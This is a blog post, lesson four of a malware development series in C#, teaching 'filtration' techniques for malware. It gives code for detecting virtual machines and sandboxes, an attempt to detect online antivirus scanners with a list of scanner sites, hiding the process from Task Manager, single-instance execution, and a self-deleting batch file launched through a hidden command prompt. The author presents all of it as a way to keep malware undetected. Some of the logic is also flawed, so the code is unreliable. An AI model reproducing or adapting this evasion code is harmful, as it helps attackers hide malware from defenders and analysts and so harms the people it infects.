Lesson 4: Filtration Techniques for Malware Development

👾 Malware Development Series by XIT (C#)

XIT
7 min readMar 24, 2023

Follow XIT on medium & UglyCompany on Telegram for more..

Below is the Topics List for Lesson 4:

4. Filtration:
⇢ Detecting Virtual Machines
⇢ Bypassing Anti-Virus Software
⇢ Anti TaskManager
⇢ Anti Repeat
⇢ Self Destruct

After learning how to gather hardware and network information for your malware tool, it’s time to investigate the filtration methods. The effectiveness and stealth of your malware programme depends on good filtering methods. You’ll learn how to identify virtual machines, get beyond anti-virus protection, put anti-TaskManager safeguards in place, stop repetitive execution, and build a self-destruct mechanism for extra security.

Topic 1: Detecting Virtual Machines

Malware testing and detection frequently employ virtual computers. We’ll demonstrate how to identify a virtual machine’s presence as well as how to alter your malware programme to avoid detection.

In your ‘Filtration.cs’ class file create a new functions for each topics that we’ll be covering in this lesson.

A] We will now write a code to detect if the target is running the malware on VM or main desk. We will retrieve the Manufacturer and Model properties of the local computer system using the Win32_ComputerSystem WMI class. Then will get the Name property of the video controller using the Win32_VideoController WMI class. Then we should make it check if the Manufacturer property contains the word "vmware", or if the Model property contains the word "VIRTUAL" and the Manufacturer property is "Microsoft Corporation", or if the Name property contains both the words "vmware" and "vbox". If any of these conditions are true, it returns true; otherwise, it returns false. Finally, we print the output to the terminal as shown below:

// detect VM
private static bool IsRunningInVirtualMachine()
{
var systemManufacturer = new ManagementObjectSearcher("SELECT Manufacturer FROM Win32_ComputerSystem").Get().OfType<ManagementObject>().FirstOrDefault()?["Manufacturer"]?.ToString();
var systemModel = new ManagementObjectSearcher("SELECT Model FROM Win32_ComputerSystem").Get().OfType<ManagementObject>().FirstOrDefault()?["Model"]?.ToString();
var videoControllerName = new ManagementObjectSearcher("SELECT Name FROM Win32_VideoController").Get().OfType<ManagementObject>().FirstOrDefault()?["Name"]?.ToString();

return (systemManufacturer?.ToLower().Contains("vmware") == true) ||
(systemModel?.ToUpperInvariant().Contains("VIRTUAL") == true && systemManufacturer?.ToLower() == "microsoft corporation") ||
(videoControllerName?.ToLower().Contains("vmware") == true && videoControllerName?.ToLower().Contains("vbox") == true);
}

Console.WriteLine(IsRunningInVirtualMachine());

It also supports for detecting the Sandbox so no need any extra code for sandbox.

Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:

True
Of course, the actual values will depend on your own system. If its VM then True else False will be the output

Topic 2: Bypassing Anti-Virus Software

Malware can be found by antivirus software, which can also stop it from running. Mostly when the smart users upload them on online scanners to scan and debug the process.

A] We will check for private network IP addresses and localhost IP addresses, and then check the hostname and IP addresses against known VirusTotal and AnyRun servers along with other popular online antivirus scanners. If any of the conditions are true, then it should return true; otherwise, it returns false. Finally, we print the output to the terminal as shown below:

// detect Scanner
try
{
string hostName = Dns.GetHostName();
IPAddress[] addresses = Dns.GetHostAddresses(hostName);

foreach (var address in addresses)
{
string ipAddress = address.ToString();
if (ipAddress.StartsWith("192.168.") || ipAddress.StartsWith("10.") || ipAddress.StartsWith("172."))
{
return false; // Ignore private network IP addresses
}
else if (ipAddress == "127.0.0.1" || ipAddress == "::1")
{
return false; // Ignore localhost IP addresses
}
else if (hostName.Contains("virustotal") || hostName.Contains("any.run") || hostName.Contains("hybrid-analysis") || hostName.Contains("metadefender") || hostName.Contains("joesecurity"))
{
return true; // Hostname contains a Scanner server
}
else if (ipAddress.StartsWith("104.16."))
{
return true; // IP address belongs to VirusTotal server
}
else if (ipAddress.StartsWith("104.20.") || ipAddress.StartsWith("104.31."))
{
return true; // IP address belongs to Cloudflare (used by many online scanners)
}
}
}
catch { }
return false;

Other popular online antivirus scanners include the following, you can include those in the above code to make it more advance:

www.virustotal.com

app.any.run

www.hybrid-analysis.com

metadefender.com

cloud.joesecurity.org

www.threatcrowd.org

www.vicheck.ca

www.reverse.it

www.joesandbox.com

www.valkyrie.comodo.com

www.threatminer.org

malwr.com

www.avcaesar.malware.lu

www.opswat.com

www.fortiguard.com

www.bluecoat.com

www.trendmicro.com

www.kaspersky.com

www.mcafee.com

www.symantec.com

www.eset.com

www.avg.com

www.bitdefender.com

www.pandasecurity.com

www.f-secure.com

www.sophos.com

www.virSCAN.org

www.threatexpert.com

www.reverse.it

www.virusscan.jotti.org

www.virusdesk.kaspersky.com

www.metascan-online.com

www.virustotal.com/gui/home/upload

www.hybrid-analysis.com/sample-upload

www.app.any.run/tasks/new

www.hybrid-analysis.com/submit

Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:

False
Of course, the actual values will depend on your own system. If its VM then True else False will be the output

Topic 3: Anti-TaskManager

Malware processes may be found and erased using the Windows Task Manager. We’ll demonstrate how to put anti-TaskManager safeguards in place to stop your malware tool from being found and eliminated.

Use the below code in order to achieve this Topic’s target, I just got it from some github repo:

// anti task mgr
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace HiddenProcess
{
class Program
{
[DllImport("user32.dll")]
static extern int GetWindowLong(IntPtr hWnd, int nIndex);

[DllImport("user32.dll")]
static extern int SetWindowLong(IntPtr hWnd, int nIndex, int dwNewLong);

[DllImport("user32.dll")]
static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags);

const int GWL_STYLE = -16;
const int WS_VISIBLE = 0x10000000;
const int SWP_HIDEWINDOW = 0x0080;

static void Main(string[] args)
{
Process currentProcess = Process.GetCurrentProcess();
IntPtr handle = currentProcess.MainWindowHandle;
int style = GetWindowLong(handle, GWL_STYLE);
SetWindowLong(handle, GWL_STYLE, style & ~WS_VISIBLE);
SetWindowPos(handle, IntPtr.Zero, 0, 0, 0, 0, SWP_HIDEWINDOW);

Console.WriteLine("The process is now hidden from the task manager.");
Console.ReadLine();
}
}
}

Topic 4: Anti-Repeat

To evade detection, try to stop your malware programme from running repeatedly on the same machine. We’ll demonstrate how to use anti-repeat safeguards to make sure that your malware programme only runs once on a machine.

A] We will retrieve the name of the current process and check how many processes are running with the same name. If the count is greater than one, it means that another instance of the program is already running, so the current instance should close itself. If the count is equal to one, the program will continue to execute the malware code as shown below:

// anti repeat
string processName = Process.GetCurrentProcess().ProcessName;

Process[] processes = Process.GetProcessesByName(processName);

if (processes.Length > 1)
{
Console.WriteLine("Another instance of the program is already running.");
Console.ReadKey();
return;
}

Console.WriteLine("Program is running.");
Console.ReadKey();

Once you create a function using the above code; call it in ‘Program.cs’ main file and run your application for test. It should get you the output as shown below:

1st run
next executions when 1st is already running

Topic 5: Self-Destruct

Lastly, for further protection, we’ll demonstrate how to construct a self-destruct mechanism. This method will make sure that your malware programme is deleted from the computer once it runs, shielding it from detection or analysis.

Self-destruct is a feature that allows a program to delete itself after it has completed its task. This can be useful in situations where a program is only needed for a specific purpose and there is no need to keep it after the task is done.

A] We first create a batch file that will delete the current executable file and the batch file itself, waits for 2 seconds, and then runs the batch file through the command prompt. It then exits the program immediately as shown below:

Remember that this code should be added at the end of your program’s main method.

// self destruct
string batch = Path.GetTempFileName() + ".bat";
string path = Process.GetCurrentProcess().MainModule.FileName;
using (StreamWriter sw = File.CreateText(batch))
{
sw.WriteLine($"ping 127.0.0.1 -n 2 > nul && del /f \"{path}\" && del \"{batch}\"");
}
Process.Start(new ProcessStartInfo()
{
FileName = "cmd.exe",
Arguments = $"/C \"{batch}\"",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
});
Environment.Exit(0);

Finally, I compiled all the topics of lesson 4 & it was detected by 0 out of 26 antivirus scans. Below is the antivirus scan report from antiscan.me :

Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:

https://x-it.medium.com/stop-killing-your-malware-learn-to-perform-safe-scans-for-self-developed-malwares-fe95480a65ed

Conclusion

Filtration techniques are essential to ensure the effectiveness and undetectability of your malware tool. In this lesson, we covered the techniques used for detecting virtual machines, bypassing anti-virus software, implementing anti-TaskManager measures, preventing repeat execution, and creating a self-destruct mechanism. With this knowledge, you can create more potent and effective malware tools. Stay tuned for our next lesson, where we’ll explore the Browser Theft techniques..

A supporter is worth a thousand followers. 😊

--

--

XIT

SHHH! The voice of none is stronger than the voice of one.